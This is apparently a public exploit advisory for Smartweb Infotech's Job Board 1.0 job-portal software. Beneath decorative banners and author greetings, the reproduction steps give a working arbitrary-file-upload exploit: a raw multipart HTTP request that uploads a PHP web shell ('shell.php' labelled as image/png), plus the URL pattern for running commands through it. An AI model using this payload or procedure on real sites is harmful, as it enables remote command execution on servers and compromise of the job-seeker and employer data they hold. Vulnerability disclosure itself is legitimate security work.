Job Board version 1.0 suffers from a remote shell upload vulnerability.
f7203303285c27e34b43e1ca88c500efecfa3ba96a7c0c4199535084be1cc9bc
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://demo.smartwebinfotech.site/job-board/ │
│ Vendor : Smartweb Infotech │
│ Software : Job Board 1.0 - Job Portal Management System │
│ Vuln Type: Arbitrary File Upload Leads to RCE │
│ Impact : Upload PHPshell and execute commands on the server │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ Allow Attacker to overwrite critical files simply by uploading a shell and execute │
│ commands on the server │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
## Steps to Reproduce:
1. Go to [My Profile] on this Path (https://website/settings/account)
2. Upload any Image to capture the request in Burp Suite
3. Replace image.png to upload.php in [filename] and add this simple phpshell
POST /job-board/settings/account HTTP/2
-----------------------------427088175318086545183087924022
Content-Disposition: form-data; name="profile"; filename="shell.php"
Content-Type: image/png
<?php echo system($_GET['command']); ?>
-----------------------------427088175318086545183087924022--
4. Send the Request
5. Back to the Path (https://website/settings/account)
6. Refresh the Page
7. Copy the Link of (Unloaded Image)
8. Paste the Link of your uploaded PHPshell - Path (https://website/storage/upload/profile/shell_1687559183.php?command=id)
9. RCE Executed!
[-] Done